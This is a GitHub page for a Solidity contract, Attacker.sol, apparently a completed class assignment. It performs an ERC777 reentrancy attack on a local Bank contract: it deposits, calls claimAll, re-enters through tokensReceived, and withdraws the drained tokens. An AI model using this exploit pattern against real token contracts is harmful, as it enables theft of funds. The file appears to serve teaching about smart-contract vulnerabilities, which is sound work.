-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathAttacker.sol
78 lines (66 loc) · 2.75 KB
/
Attacker.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
pragma solidity ^0.8.17;
import "@openzeppelin/contracts/access/AccessControl.sol";
import "@openzeppelin/contracts/token/ERC777/ERC777.sol";
import "@openzeppelin/contracts/token/ERC777/IERC777Recipient.sol";
import "@openzeppelin/contracts/interfaces/IERC1820Registry.sol";
import "./Bank.sol";
contract Attacker is AccessControl, IERC777Recipient {
bytes32 public constant ATTACKER_ROLE = keccak256("ATTACKER_ROLE");
IERC1820Registry private _erc1820 = IERC1820Registry(0x1820a4B7618BdE71Dce8cdc73aAB6C95905faD24); //This is the location of the EIP1820 registry
bytes32 constant private TOKENS_RECIPIENT_INTERFACE_HASH = keccak256("ERC777TokensRecipient"); //When someone tries to send an ERC777 contract, they check if the recipient implements this interface
uint8 depth = 0;
uint8 max_depth = 2;
Bank public bank;
event Deposit(uint256 amount );
event Recurse(uint8 depth);
constructor(address admin) {
_grantRole(DEFAULT_ADMIN_ROLE, admin);
_grantRole(ATTACKER_ROLE, admin);
_erc1820.setInterfaceImplementer(address(this),TOKENS_RECIPIENT_INTERFACE_HASH,address(this)); //In order to receive ERC777 (like the MCITR tokens used in the attack) you must register with the EIP1820 Registry
}
function setTarget(address bank_address) external onlyRole(ATTACKER_ROLE) {
bank = Bank(bank_address);
_grantRole(ATTACKER_ROLE, address(this));
_grantRole(ATTACKER_ROLE, bank.token.address );
}
/*
The main attack function that should start the reentrancy attack
amt is the amt of ETH the attacker will deposit initially to start the attack
*/
function attack(uint256 amt) payable public {
require( address(bank) != address(0), "Target bank not set" );
//YOUR CODE TO START ATTACK GOES HERE
//First call the deposit() function
bank.deposit{value: amt}();
// Call the vulnerable claimAll function to trigger eentrancy attack
bank.claimAll();
}
/*
After the attack, this contract has a lot of (stolen) MCITR tokens
This function sends those tokens to the target recipient
*/
function withdraw(address recipient) public onlyRole(ATTACKER_ROLE) {
ERC777 token = bank.token();
token.send(recipient,token.balanceOf(address(this)),"");
}
/*
This is the function that gets called when the Bank contract sends MCITR tokens
*/
function tokensReceived(
address operator,
address from,
address to,
uint256 amount,
bytes calldata userData,
bytes calldata operatorData
) external {
//YOUR CODE TO RECURSE GOES HERE
// Limit the depth of recursion to prevent infinite loops
if (depth < max_depth) {
depth++; // Increase the recursion depth
emit Recurse(depth);
// Re-enter the claimAll function to trigger the attack again
bank.claimAll();
}
}
}